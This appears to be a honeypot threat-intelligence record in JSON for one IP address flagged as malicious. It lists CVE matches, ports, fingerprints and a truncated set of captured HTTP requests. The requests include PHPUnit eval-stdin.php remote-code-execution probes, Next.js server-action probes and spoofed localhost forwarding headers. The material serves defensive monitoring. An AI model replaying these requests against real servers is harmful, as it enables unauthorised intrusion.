{"ip":"185.177.72.52","total_events":3581,"verdict":{"verdict":"malicious","label":"Exploit attempts observed","detail":"18 exploit-path hits","confidence":"high","network_type":null},"first_seen":"2026-03-30T12:02:01","last_seen":"2026-06-30T08:19:01","events_24h":0,"events_7d":569,"geo":{"country_code":"FR","country_name":"France","region":"","city":"","lat":48.8582,"lon":2.3387,"asn":211590,"org":"Bucklog SARL"},"source_domain":null,"known_scanners":[],"scanner_tag":null,"cve_matches":[{"cve_id":"CVE-2025-64328","title":"FreePBX  >= 17.0.2.36 && < 17.0.3 - Authenticated Command Injection","severity":"critical","actively_exploited":true,"match_field":"url_path","matched_pattern":"/admin/config.php"},{"cve_id":"CVE-2024-4836","title":"Edito CMS - Sensitive Data Leak","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/config.php"},{"cve_id":"CVE-2024-50340","title":"Symfony Profiler - Remote Access via Injected Arguments","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/_profiler/phpinfo"},{"cve_id":"CVE-2026-3396","title":"WCAPF WooCommerce Ajax Product Filter - SQL Injection","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/shop"},{"cve_id":"CVE-2026-4020","title":"Gravity SMTP WordPress Plugin - Sensitive Information Exposure","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/wp-json/gravitysmtp/v1/tests/mock-data"},{"cve_id":"CVE-2018-13380","title":"Fortinet FortiOS - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/message"},{"cve_id":"CVE-2019-12461","title":"WebPort 1.19.1 - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/log"},{"cve_id":"CVE-2020-15895","title":"D-Link DIR-816L 2.x - Cross-Site Scripting","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/info.php"},{"cve_id":"CVE-2021-28169","title":"Eclipse Jetty ConcatServlet - Information Disclosure","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/static"},{"cve_id":"CVE-2021-37598","title":"WP Cerber < 8.9.3 - Broken Access Control","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/wp-json"}],"top_ports":[{"port":6565,"proto":"tcp","label":"","count":3002},{"port":8452,"proto":"tcp","label":"","count":569},{"port":3702,"proto":"tcp","label":"","count":4},{"port":9999,"proto":"tcp","label":"","count":4},{"port":7443,"proto":"tcp","label":"","count":2}],"fingerprints":{"ssh_hassh":[],"tls_ja4":["t13i1010h2_18ef40b21276_879711aa9f16"],"tls_ja3":["a1b77074bab81e5056ba398e26f31871"],"ja4h":["po11nn16en_4c8fc78b5554","po11nn24en_18ca1fe4ca49","po11nn16en_da52ba446636","ge11nn14en_068ebe3632ec"]},"fingerprint_peers":{"t13i1010h2_18ef40b21276_879711aa9f16":5,"ge11nn14en_068ebe3632ec":17,"po11nn16en_4c8fc78b5554":6,"po11nn24en_18ca1fe4ca49":7,"po11nn16en_da52ba446636":7},"user_agents":["Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36","curl/8.7.1"],"timeline":[{"date":"2026-04-02","count":2},{"date":"2026-04-04","count":2},{"date":"2026-04-07","count":2},{"date":"2026-04-08","count":2},{"date":"2026-06-11","count":3000},{"date":"2026-06-30","count":569}],"recent_events":[{"timestamp":"2026-06-30T08:19:01","port":8452,"proto":"tcp","app_proto":"tls","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip\",\"accept-language\":\"en-US,en;q=0.9\",\"content-length\":\"33\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:8452\",\"true-client-ip\":\"127.0.0.1\",\"user-agent\":\"curl/8.7.1\",\"x-azure-clientip\":\"127.0.0.1\",\"x-azure-socketip\":\"127.0.0.1\",\"x-client-ip\":\"127.0.0.1\",\"x-forwarded-for\":\"127.0.0.1\",\"x-forwared\":\"127.0.0.1\",\"x-host\":\"127.0.0.1\",\"x-originating-ip\":\"127.0.0.1\",\"x-real-ip\":\"127.0.0.1\"}","body":"<?php echo md5('phpunit_rce'); ?>","sni":"","tls_cipher":"TLS_AES_128_GCM_SHA256","tls_version":"TLSv1.3","alpn":["h2","http/1.1"],"url_path":"/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","summary":"","payload_hex":"504f5354202f6c69622f76656e646f722f706870756e69742f706870756e69742f7372632f5574696c2f5048502f6576616c2d737464696e2e70687020485454502f312e310d0a486f73743a20<HONEYPOT>3a383435320d0a557365722d4167656e743a206375726c2f382e372e310d0a4163636570743a202a2f2a0d0a4163636570742d456e636f64696e673a20677a69700d0a4163636570742d4c616e67756167653a20656e2d55532c656e3b713d302e390d0a582d466f727761726465642d466f723a203132372e302e302e310d0a582d5265616c2d49503a203132372e302e302e310d0a582d4f726967696e6174696e672d49503a203132372e302e302e310d0a582d436c69656e742d49503a203132372e302e302e310d0a547275652d436c69656e742d49503a203132372e302e302e310d0a582d417a7572652d436c69656e7449503a203132372e302e302e310d0a582d417a7572652d536f636b657449503a203132372e302e302e310d0a582d486f73743a203132372e302e302e310d0a582d466f7277617265643a203132372e302e302e310d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a2033330d0a0d0a3c3f706870206563686f206d64352827706870756e69745f72636527293b203f3e","method":"POST","user_agent":"curl/8.7.1","community_id":"1:pn7B+3JSXQgvuHFoVsvvIY6twxU=","ja3":"a1b77074bab81e5056ba398e26f31871","session":"f30364c1-7bf3-4b8b-b6d4-6704aad36a57","seq":1,"duration_ms":100,"bytes_in":525,"bytes_out":78},{"timestamp":"2026-06-30T08:19:01","port":8452,"proto":"tcp","app_proto":"tls","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip\",\"accept-language\":\"en-US,en;q=0.9\",\"content-length\":\"33\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:8452\",\"true-client-ip\":\"127.0.0.1\",\"user-agent\":\"curl/8.7.1\",\"x-azure-clientip\":\"127.0.0.1\",\"x-azure-socketip\":\"127.0.0.1\",\"x-client-ip\":\"127.0.0.1\",\"x-forwarded-for\":\"127.0.0.1\",\"x-forwared\":\"127.0.0.1\",\"x-host\":\"127.0.0.1\",\"x-originating-ip\":\"127.0.0.1\",\"x-real-ip\":\"127.0.0.1\"}","body":"<?php echo md5('phpunit_rce'); ?>","sni":"","tls_cipher":"TLS_AES_128_GCM_SHA256","tls_version":"TLSv1.3","alpn":["h2","http/1.1"],"url_path":"/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","summary":"","payload_hex":"504f5354202f7a656e642f76656e646f722f706870756e69742f706870756e69742f7372632f5574696c2f5048502f6576616c2d737464696e2e70687020485454502f312e310d0a486f73743a20<HONEYPOT>3a383435320d0a557365722d4167656e743a206375726c2f382e372e310d0a4163636570743a202a2f2a0d0a4163636570742d456e636f64696e673a20677a69700d0a4163636570742d4c616e67756167653a20656e2d55532c656e3b713d302e390d0a582d466f727761726465642d466f723a203132372e302e302e310d0a582d5265616c2d49503a203132372e302e302e310d0a582d4f726967696e6174696e672d49503a203132372e302e302e310d0a582d436c69656e742d49503a203132372e302e302e310d0a547275652d436c69656e742d49503a203132372e302e302e310d0a582d417a7572652d436c69656e7449503a203132372e302e302e310d0a582d417a7572652d536f636b657449503a203132372e302e302e310d0a582d486f73743a203132372e302e302e310d0a582d466f7277617265643a203132372e302e302e310d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a2033330d0a0d0a3c3f706870206563686f206d64352827706870756e69745f72636527293b203f3e","method":"POST","user_agent":"curl/8.7.1","community_id":"1:UiLgBiv/5nIr0ZPbZuzgKRjf3kI=","ja3":"a1b77074bab81e5056ba398e26f31871","session":"0141ab71-67a3-4d9c-9d8c-252a69a76f64","seq":1,"duration_ms":100,"bytes_in":526,"bytes_out":78},{"timestamp":"2026-06-30T08:19:01","port":8452,"proto":"tcp","app_proto":"tls","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip\",\"accept-language\":\"en-US,en;q=0.9\",\"content-length\":\"33\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:8452\",\"true-client-ip\":\"127.0.0.1\",\"user-agent\":\"curl/8.7.1\",\"x-azure-clientip\":\"127.0.0.1\",\"x-azure-socketip\":\"127.0.0.1\",\"x-client-ip\":\"127.0.0.1\",\"x-forwarded-for\":\"127.0.0.1\",\"x-forwared\":\"127.0.0.1\",\"x-host\":\"127.0.0.1\",\"x-originating-ip\":\"127.0.0.1\",\"x-real-ip\":\"127.0.0.1\"}","body":"<?php echo md5('phpunit_rce'); ?>","sni":"","tls_cipher":"TLS_AES_128_GCM_SHA256","tls_version":"TLSv1.3","alpn":["h2","http/1.1"],"url_path":"/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","summary":"","payload_hex":"504f5354202f7969692f76656e646f722f706870756e69742f706870756e69742f7372632f5574696c2f5048502f6576616c2d737464696e2e70687020485454502f312e310d0a486f73743a20<HONEYPOT>3a383435320d0a557365722d4167656e743a206375726c2f382e372e310d0a4163636570743a202a2f2a0d0a4163636570742d456e636f64696e673a20677a69700d0a4163636570742d4c616e67756167653a20656e2d55532c656e3b713d302e390d0a582d466f727761726465642d466f723a203132372e302e302e310d0a582d5265616c2d49503a203132372e302e302e310d0a582d4f726967696e6174696e672d49503a203132372e302e302e310d0a582d436c69656e742d49503a203132372e302e302e310d0a547275652d436c69656e742d49503a203132372e302e302e310d0a582d417a7572652d436c69656e7449503a203132372e302e302e310d0a582d417a7572652d536f636b657449503a203132372e302e302e310d0a582d486f73743a203132372e302e302e310d0a582d466f7277617265643a203132372e302e302e310d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a2033330d0a0d0a3c3f706870206563686f206d64352827706870756e69745f72636527293b203f3e","method":"POST","user_agent":"curl/8.7.1","community_id":"1:/9LpInTLYDzIgi+civB296kR6IQ=","ja3":"a1b77074bab81e5056ba398e26f31871","session":"71e90381-7f3a-483e-9ae5-a33fd88c41d7","seq":1,"duration_ms":100,"bytes_in":525,"bytes_out":78},{"timestamp":"2026-06-30T08:19:01","port":8452,"proto":"tcp","app_proto":"tls","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip\",\"accept-language\":\"en-US,en;q=0.9\",\"content-length\":\"33\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:8452\",\"true-client-ip\":\"127.0.0.1\",\"user-agent\":\"curl/8.7.1\",\"x-azure-clientip\":\"127.0.0.1\",\"x-azure-socketip\":\"127.0.0.1\",\"x-client-ip\":\"127.0.0.1\",\"x-forwarded-for\":\"127.0.0.1\",\"x-forwared\":\"127.0.0.1\",\"x-host\":\"127.0.0.1\",\"x-originating-ip\":\"127.0.0.1\",\"x-real-ip\":\"127.0.0.1\"}","body":"<?php echo md5('phpunit_rce'); ?>","sni":"","tls_cipher":"TLS_AES_128_GCM_SHA256","tls_version":"TLSv1.3","alpn":["h2","http/1.1"],"url_path":"/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","summary":"","payload_hex":"504f5354202f6c61726176656c2f76656e646f722f706870756e69742f706870756e69742f7372632f5574696c2f5048502f6576616c2d737464696e2e70687020485454502f312e310d0a486f73743a20<HONEYPOT>3a383435320d0a557365722d4167656e743a206375726c2f382e372e310d0a4163636570743a202a2f2a0d0a4163636570742d456e636f64696e673a20677a69700d0a4163636570742d4c616e67756167653a20656e2d55532c656e3b713d302e390d0a582d466f727761726465642d466f723a203132372e302e302e310d0a582d5265616c2d49503a203132372e302e302e310d0a582d4f726967696e6174696e672d49503a203132372e302e302e310d0a582d436c69656e742d49503a203132372e302e302e310d0a547275652d436c69656e742d49503a203132372e302e302e310d0a582d417a7572652d436c69656e7449503a203132372e302e302e310d0a582d417a7572652d536f636b657449503a203132372e302e302e310d0a582d486f73743a203132372e302e302e310d0a582d466f7277617265643a203132372e302e302e310d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a2033330d0a0d0a3c3f706870206563686f206d64352827706870756e69745f72636527293b203f3e","method":"POST","user_agent":"curl/8.7.1","community_id":"1:+AOL9AUDapkwdA+eUGJBv3HhuMM=","ja3":"a1b77074bab81e5056ba398e26f31871","session":"2bf47282-aec3-411e-bc4c-35e2378a1987","seq":1,"duration_ms":101,"bytes_in":529,"bytes_out":78},{"timestamp":"2026-06-30T08:19:01","port":8452,"proto":"tcp","app_proto":"tls","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip\",\"accept-language\":\"en-US,en;q=0.9\",\"content-length\":\"33\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:8452\",\"true-client-ip\":\"127.0.0.1\",\"user-agent\":\"curl/8.7.1\",\"x-azure-clientip\":\"127.0.0.1\",\"x-azure-socketip\":\"127.0.0.1\",\"x-client-ip\":\"127.0.0.1\",\"x-forwarded-for\":\"127.0.0.1\",\"x-forwared\":\"127.0.0.1\",\"x-host\":\"127.0.0.1\",\"x-originating-ip\":\"127.0.0.1\",\"x-real-ip\":\"127.0.0.1\"}","body":"<?php echo md5('phpunit_rce'); ?>","sni":"","tls_cipher":"TLS_AES_128_GCM_SHA256","tls_version":"TLSv1.3","alpn":["h2","http/1.1"],"url_path":"/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php","summary":"","payload_hex":"504f5354202f76656e646f722f706870756e69742f706870756e69742f5574696c2f5048502f6576616c2d737464696e2e70687020485454502f312e310d0a486f73743a20<HONEYPOT>3a383435320d0a557365722d4167656e743a206375726c2f382e372e310d0a4163636570743a202a2f2a0d0a4163636570742d456e636f64696e673a20677a69700d0a4163636570742d4c616e67756167653a20656e2d55532c656e3b713d302e390d0a582d466f727761726465642d466f723a203132372e302e302e310d0a582d5265616c2d49503a203132372e302e302e310d0a582d4f726967696e6174696e672d49503a203132372e302e302e310d0a582d436c69656e742d49503a203132372e302e302e310d0a547275652d436c69656e742d49503a203132372e302e302e310d0a582d417a7572652d436c69656e7449503a203132372e302e302e310d0a582d417a7572652d536f636b657449503a203132372e302e302e310d0a582d486f73743a203132372e302e302e310d0a582d466f7277617265643a203132372e302e302e310d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a2033330d0a0d0a3c3f706870206563686f206d64352827706870756e69745f72636527293b203f3e","method":"POST","user_agent":"curl/8.7.1","community_id":"1:7nv3wxaWOzCGvq+vs3HYoAfG8/w=","ja3":"a1b77074bab81e5056ba398e26f31871","session":"dcd09784-ebc3-4f43-9a6a-b6246f8554c1","seq":1,"duration_ms":101,"bytes_in":517,"bytes_out":78},{"timestamp":"2026-06-30T08:19:01","port":8452,"proto":"tcp","app_proto":"tls","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"*/*\",\"accept-encoding\":\"gzip\",\"accept-language\":\"en-US,en;q=0.9\",\"content-length\":\"33\",\"content-type\":\"application/x-www-form-urlencoded\",\"host\":\"<HONEYPOT>:8452\",\"true-client-ip\":\"127.0.0.1\",\"user-agent\":\"curl/8.7.1\",\"x-azure-clientip\":\"127.0.0.1\",\"x-azure-socketip\":\"127.0.0.1\",\"x-client-ip\":\"127.0.0.1\",\"x-forwarded-for\":\"127.0.0.1\",\"x-forwared\":\"127.0.0.1\",\"x-host\":\"127.0.0.1\",\"x-originating-ip\":\"127.0.0.1\",\"x-real-ip\":\"127.0.0.1\"}","body":"<?php echo md5('phpunit_rce'); ?>","sni":"","tls_cipher":"TLS_AES_128_GCM_SHA256","tls_version":"TLSv1.3","alpn":["h2","http/1.1"],"url_path":"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php","summary":"","payload_hex":"504f5354202f76656e646f722f706870756e69742f706870756e69742f7372632f5574696c2f5048502f6576616c2d737464696e2e70687020485454502f312e310d0a486f73743a20<HONEYPOT>3a383435320d0a557365722d4167656e743a206375726c2f382e372e310d0a4163636570743a202a2f2a0d0a4163636570742d456e636f64696e673a20677a69700d0a4163636570742d4c616e67756167653a20656e2d55532c656e3b713d302e390d0a582d466f727761726465642d466f723a203132372e302e302e310d0a582d5265616c2d49503a203132372e302e302e310d0a582d4f726967696e6174696e672d49503a203132372e302e302e310d0a582d436c69656e742d49503a203132372e302e302e310d0a547275652d436c69656e742d49503a203132372e302e302e310d0a582d417a7572652d436c69656e7449503a203132372e302e302e310d0a582d417a7572652d536f636b657449503a203132372e302e302e310d0a582d486f73743a203132372e302e302e310d0a582d466f7277617265643a203132372e302e302e310d0a436f6e74656e742d547970653a206170706c69636174696f6e2f782d7777772d666f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a2033330d0a0d0a3c3f706870206563686f206d64352827706870756e69745f72636527293b203f3e","method":"POST","user_agent":"curl/8.7.1","community_id":"1:otwIOQyPlovRfi3e58e+lUugR0o=","ja3":"a1b77074bab81e5056ba398e26f31871","session":"45bd98a3-76bd-46e3-9414-765a1b77ff85","seq":1,"duration_ms":100,"bytes_in":521,"bytes_out":78},{"timestamp":"2026-06-30T08:19:00","port":8452,"proto":"tcp","app_proto":"tls","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/x-component\",\"accept-encoding\":\"gzip\",\"accept-language\":\"en-US,en;q=0.9\",\"content-length\":\"0\",\"content-type\":\"multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad\",\"host\":\"<HONEYPOT>:8452\",\"true-client-ip\":\"127.0.0.1\",\"user-agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"x-azure-clientip\":\"127.0.0.1\",\"x-azure-socketip\":\"127.0.0.1\",\"x-client-ip\":\"127.0.0.1\",\"x-forwarded-for\":\"127.0.0.1\",\"x-forwared\":\"127.0.0.1\",\"x-host\":\"127.0.0.1\",\"x-originating-ip\":\"127.0.0.1\",\"x-real-ip\":\"127.0.0.1\"}","body":"","sni":"","tls_cipher":"TLS_AES_128_GCM_SHA256","tls_version":"TLSv1.3","alpn":["h2","http/1.1"],"url_path":"/RSC/R/w9zoggj3f6vup1w.txt","summary":"","payload_hex":"504f5354202f5253432f522f77397a6f67676a33663676757031772e74787420485454502f312e310d0a486f73743a20<HONEYPOT>3a383435320d0a4163636570742d456e636f64696e673a20677a69700d0a4163636570742d4c616e67756167653a20656e2d55532c656e3b713d302e390d0a582d466f727761726465642d466f723a203132372e302e302e310d0a582d5265616c2d49503a203132372e302e302e310d0a582d4f726967696e6174696e672d49503a203132372e302e302e310d0a582d436c69656e742d49503a203132372e302e302e310d0a547275652d436c69656e742d49503a203132372e302e302e310d0a582d417a7572652d436c69656e7449503a203132372e302e302e310d0a582d417a7572652d536f636b657449503a203132372e302e302e310d0a582d486f73743a203132372e302e302e310d0a582d466f7277617265643a203132372e302e302e310d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d2d2d2d2d5765624b6974466f726d426f756e6461727978386a4f326f566336535750335361640d0a4163636570743a20746578742f782d636f6d706f6e656e740d0a557365722d4167656e743a204d6f7a696c6c612f352e30202857696e646f7773204e542031302e303b2057696e36343b2078363429204170706c655765624b69742f3533372e33360d0a436f6e74656e742d4c656e6774683a20300d0a0d0a","method":"POST","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36","community_id":"1:BNXJL0i4S9UZq7uE8JRBKD4TO+k=","ja3":"a1b77074bab81e5056ba398e26f31871","session":"da1fd776-afc9-480a-bfed-8df9adef368f","seq":1,"duration_ms":100,"bytes_in":560,"bytes_out":78},{"timestamp":"2026-06-30T08:19:00","port":8452,"proto":"tcp","app_proto":"tls","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/x-component\",\"accept-encoding\":\"gzip\",\"accept-language\":\"en-US,en;q=0.9\",\"content-length\":\"0\",\"content-type\":\"multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad\",\"host\":\"<HONEYPOT>:8452\",\"true-client-ip\":\"127.0.0.1\",\"user-agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"x-azure-clientip\":\"127.0.0.1\",\"x-azure-socketip\":\"127.0.0.1\",\"x-client-ip\":\"127.0.0.1\",\"x-forwarded-for\":\"127.0.0.1\",\"x-forwared\":\"127.0.0.1\",\"x-host\":\"127.0.0.1\",\"x-originating-ip\":\"127.0.0.1\",\"x-real-ip\":\"127.0.0.1\"}","body":"","sni":"","tls_cipher":"TLS_AES_128_GCM_SHA256","tls_version":"TLSv1.3","alpn":["h2","http/1.1"],"url_path":"/RSC/31qin2pjf8squf3.txt","summary":"","payload_hex":"504f5354202f5253432f333171696e32706a663873717566332e74787420485454502f312e310d0a486f73743a20<HONEYPOT>3a383435320d0a4163636570742d456e636f64696e673a20677a69700d0a4163636570742d4c616e67756167653a20656e2d55532c656e3b713d302e390d0a582d466f727761726465642d466f723a203132372e302e302e310d0a582d5265616c2d49503a203132372e302e302e310d0a582d4f726967696e6174696e672d49503a203132372e302e302e310d0a582d436c69656e742d49503a203132372e302e302e310d0a547275652d436c69656e742d49503a203132372e302e302e310d0a582d417a7572652d436c69656e7449503a203132372e302e302e310d0a582d417a7572652d536f636b657449503a203132372e302e302e310d0a582d486f73743a203132372e302e302e310d0a582d466f7277617265643a203132372e302e302e310d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d2d2d2d2d5765624b6974466f726d426f756e6461727978386a4f326f566336535750335361640d0a4163636570743a20746578742f782d636f6d706f6e656e740d0a557365722d4167656e743a204d6f7a696c6c612f352e30202857696e646f7773204e542031302e303b2057696e36343b2078363429204170706c655765624b69742f3533372e33360d0a436f6e74656e742d4c656e6774683a20300d0a0d0a","method":"POST","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36","community_id":"1:GNbq0qLEs7aR1Guh0/EQ9/4jIrQ=","ja3":"a1b77074bab81e5056ba398e26f31871","session":"01fdd2ed-de4d-47e2-b5af-9ddb88917034","seq":1,"duration_ms":100,"bytes_in":558,"bytes_out":78},{"timestamp":"2026-06-30T08:19:00","port":8452,"proto":"tcp","app_proto":"tls","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/x-component\",\"accept-encoding\":\"gzip\",\"accept-language\":\"en-US,en;q=0.9\",\"cf-connecting-ip\":\"127.0.0.1\",\"content-length\":\"232\",\"content-type\":\"multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad\",\"host\":\"<HONEYPOT>:8452\",\"next-action\":\"x\",\"next-router-state-tree\":\"%5B%22%22%2C%7B%7D%5D\",\"true-client-ip\":\"127.0.0.1\",\"user-agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"x-azure-clientip\":\"127.0.0.1\",\"x-azure-socketip\":\"127.0.0.1\",\"x-client-ip\":\"127.0.0.1\",\"x-forwarded-for\":\"127.0.0.1\",\"x-forwared\":\"127.0.0.1\",\"x-host\":\"127.0.0.1\",\"x-originating-ip\":\"127.0.0.1\",\"x-real-ip\":\"127.0.0.1\"}","body":"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n{}\r\n------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n[\"$1:aa:aa\"]\r\n------WebKitFormBoundaryx8jO2oVc6SWP3Sad--","sni":"","tls_cipher":"TLS_AES_128_GCM_SHA256","tls_version":"TLSv1.3","alpn":["h2","http/1.1"],"url_path":"/_next/image","summary":"","payload_hex":"504f5354202f5f6e6578742f696d61676520485454502f312e310d0a486f73743a20<HONEYPOT>3a383435320d0a4163636570742d456e636f64696e673a20677a69700d0a4163636570742d4c616e67756167653a20656e2d55532c656e3b713d302e390d0a582d466f727761726465642d466f723a203132372e302e302e310d0a582d5265616c2d49503a203132372e302e302e310d0a582d4f726967696e6174696e672d49503a203132372e302e302e310d0a582d436c69656e742d49503a203132372e302e302e310d0a547275652d436c69656e742d49503a203132372e302e302e310d0a582d417a7572652d436c69656e7449503a203132372e302e302e310d0a582d417a7572652d536f636b657449503a203132372e302e302e310d0a582d486f73743a203132372e302e302e310d0a582d466f7277617265643a203132372e302e302e310d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d2d2d2d2d5765624b6974466f726d426f756e6461727978386a4f326f566336535750335361640d0a4163636570743a20746578742f782d636f6d706f6e656e740d0a4e6578742d416374696f6e3a20780d0a4e6578742d526f757465722d53746174652d547265653a202535422532322532322532432537422537442535440d0a557365722d4167656e743a204d6f7a696c6c612f352e30202857696e646f7773204e542031302e303b2057696e36343b2078363429204170706c655765624b69742f3533372e33360d0a582d466f727761726465642d466f723a203132372e302e302e310d0a582d5265616c2d49503a203132372e302e302e310d0a582d4f726967696e6174696e672d49503a203132372e302e302e310d0a582d436c69656e742d49503a203132372e302e302e310d0a547275652d436c69656e742d49503a203132372e302e302e310d0a43462d436f6e6e656374696e672d49503a203132372e302e302e310d0a436f6e74656e742d4c656e6774683a203233320d0a0d0a2d2d2d2d2d2d5765624b6974466f726d426f756e6461727978386a4f326f566336535750335361640d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2231220d0a0d0a7b7d0d0a2d2d2d2d2d2d5765624b6974466f726d426f756e6461727978386a4f326f566336535750335361640d0a436f6e74656e742d446973706f736974696f6e3a20666f726d2d646174613b206e616d653d2230220d0a0d0a5b2224313a61613a6161225d0d0a2d2d2d2d2d2d5765624b6974466f726d426f756e6461727978386a4f326f566336535750335361642d2d","method":"POST","user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36","community_id":"1:dzZMQnnh0V/VI9as/rqtbxHdqts=","ja3":"a1b77074bab81e5056ba398e26f31871","session":"fafd5a12-5d00-40eb-abce-842d0fba2a30","seq":1,"duration_ms":100,"bytes_in":1002,"bytes_out":78},{"timestamp":"2026-06-30T08:19:00","port":8452,"proto":"tcp","app_proto":"tls","app_protocol":"http","host":"<HONEYPOT>","headers":"{\"accept\":\"text/x-component\",\"accept-encoding\":\"gzip\",\"accept-language\":\"en-US,en;q=0.9\",\"cf-connecting-ip\":\"127.0.0.1\",\"content-length\":\"232\",\"content-type\":\"multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad\",\"host\":\"<HONEYPOT>:8452\",\"next-action\":\"x\",\"next-router-state-tree\":\"%5B%22%22%2C%7B%7D%5D\",\"true-client-ip\":\"127.0.0.1\",\"user-agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\",\"x-azure-clientip\":\"127.0.0.1\",\"x-azure-socketip\":\"127.0.0.1\",\"x-client-ip\":\"127.0.0.1\",\"x-forwarded-for\":\"127.0.0.1\",\"x-forwared\":\"127.0.0.1\",\"x-host\":\"127.0.0.1\",\"x-originating-ip\":\"127.0.0.1\",\"x-real-ip\":\"127.0.0.1\"}","body":"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\nContent-Disposition: form-data; name=\"1\"\r\n\r\n{}\r\n------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\nContent-Disposition: form-data; name=\"0\"\r\n\r\n[\"$1:aa:aa\"]\r\n------WebKitFormBoundaryx8jO2oVc6SWP3Sad--","sni":"","tls_cipher":"TLS_AES_128_GCM_SHA256","tls_version":"TLSv1.3","alpn":["h2","http/1.1"],"url_path":"/_middleware","summary":"","payload_hex":"504f5354202f5f6d6964646c657761726520485454502f312e310d0a486f73743a20<HONEYPOT>3a383435320d0a4163636570742d456e636f64696e673a20677a69700d0a4163636570742d4c616e67756167653a20656e2d55532c656e3b713d302e390d0a582d466f727761726465642d466f723a203132372e302e302e310d0a582d5265616c2d49503a203132372e302e302e310d0a582d4f726967696e6174696e672d49503a203132372e302e302e310d0a582d436c69656e742d49503a203132372e302e302e310d0a547275652d436c69656e742d49503a203132372e302e302e310d0a582d417a7572652d436c69656e7449503a203132372e302e302e310d0a582d417a7572652d536f636b657449503a203132372e302e302e310d0a582d486f73743a203132372e302e302e310d0a582d466f7277617265643a203132372e302e302e310d0a436f6e74656e742d547970653a206d756c7469706172742f666f726d2d646174613b20626f756e646172793d2d2d2d2d5765624b6974466f726d426f756e6461727978386a4f326f566336535750335361640d0a4163636570743a20746578742f782d636f6d706f6e656e740d0a4e6578742d416374696f6e3a20780d0a4e6578742d526f757465722d53746174652d547265653a202535422532322532322532432537422537442535440d0a557365722d4167656e743a204d6f7a696c6c612f352e30202857696e646f7773204e542031302e303b2057696e36343b2078363429204170706c655765624b69742f3533372e33360d0a582d466f727761726465642d466f723a203132372e302e302e310d0a582d5265616c2d49503a203132372e302e302e310d0a582d4f726967696e6174696e672d49503a203132372e302e302e310d0a582d436c69656e742d49503a203132372e302e302e310d0a547275652d436c69656e742d49503a203132372e302e302e310d0a43462d436f6e6e656374696e672d49503a203132372e302e302e310d0a436f6e74656e742d4c656e6774683a203233320d0